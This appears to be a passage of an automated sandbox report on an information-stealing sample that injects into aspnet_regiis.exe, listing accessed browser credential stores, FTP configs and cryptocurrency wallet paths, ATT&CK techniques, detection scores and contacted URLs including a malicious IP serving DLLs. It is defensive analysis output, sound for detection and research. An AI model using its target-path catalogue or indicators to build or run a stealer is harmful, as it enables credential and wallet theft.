                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: info.seco
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Exodus
                          Source: aspnet_regiis.exe, 00000003.00000002.2579443160.0000000000CEE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *ethereum*.*
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: seed.seco
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                          Source: Yara matchFile source: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7620, type: MEMORYSTR

                          Remote Access Functionality

                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6d771000.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6d771000.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6d740000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7500, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7620, type: MEMORYSTR
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CE10C40 sqlite3_bind_zeroblob,3_2_6CE10C40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CE10D60 sqlite3_bind_parameter_name,3_2_6CE10D60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CD38EA0 sqlite3_clear_bindings,3_2_6CD38EA0
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 511 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 4 Obfuscated Files or Information | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 54 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 511 Process Injection | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
[Behavior graph (image not reproduced): Behavior Graph ID: 1524652, Sample: file.exe, Start date: 03/10/2024, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| file.exe | 28% | Virustotal | | Browse |
| file.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Roaming\msvcp110.dll | 100% | Joe Sandbox ML | | |
| C:\ProgramData\freebl3.dll | 0% | ReversingLabs | | |
| C:\ProgramData\mozglue.dll | 0% | ReversingLabs | | |
| C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | | |
| C:\ProgramData\nss3.dll | 0% | ReversingLabs | | |
| C:\ProgramData\softokn3.dll | 0% | ReversingLabs | | |
| C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | | |

No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| steamcommunity.com | 0% | Virustotal | | Browse |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| steamcommunity.com | 104.102.49.254 | true | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://49.12.197.9/ | true | | unknown |
| https://49.12.197.9/freebl3.dll | true | | unknown |
| https://49.12.197.9/sqlp.dll | true | | unknown |
| https://49.12.197.9/softokn3.dll | true | | unknown |
| https://49.12.197.9/vcruntime140.dll | true | | unknown |
| https://49.12.197.9/nss3.dll | true | | unknown |
| https://49.12.197.9/mozglue.dll | true | | unknown |
                                              • URL Reputation: safe
                                              unknown
                                              https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2aaspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://s.ytimg.com;aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://steam.tv/aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLKBKJKEB.3.drfalse
                                                  unknown
                                                  https://49.12.197.9/4aspnet_regiis.exe, 00000003.00000003.1659962296.0000000003181000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://t.me/ae5edfile.exe, 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                                                    http://www.mozilla.com/en-US/blocklist/aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.drfalseunknown
                                                    https://49.12.197.9/0Hwaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://mozilla.org0/aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwPaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                                      http://www.entrust.net/rpa03file.exefalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://store.steampowered.com/points/shop/aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://sketchfab.comaspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                      https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://49.12.197.9/msvcp140.dll=Bxaspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://lv.queniujq.cnaspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBKJKEB.3.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.youtube.com/aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&aaspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199780418869[1].htm.3.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://steamcommunity.com/profiles/765611997804188694-aspnet_regiis.exe, 00000003.00000003.1589017924.0000000003187000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=enaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amaspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.google.com/recaptcha/aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://checkout.steampowered.com/aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgaspnet_regiis.exe, 00000003.00000002.2579771123.0000000003290000.00000004.00000020.00020000.00000000.sdmp, GIEBFH.3.drfalse
                                                              unknown
                                                              https://49.12.197.9/AR:aspnet_regiis.exe, 00000003.00000003.1748296840.00000000031E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                • URL Reputation: safe
                                                                unknown
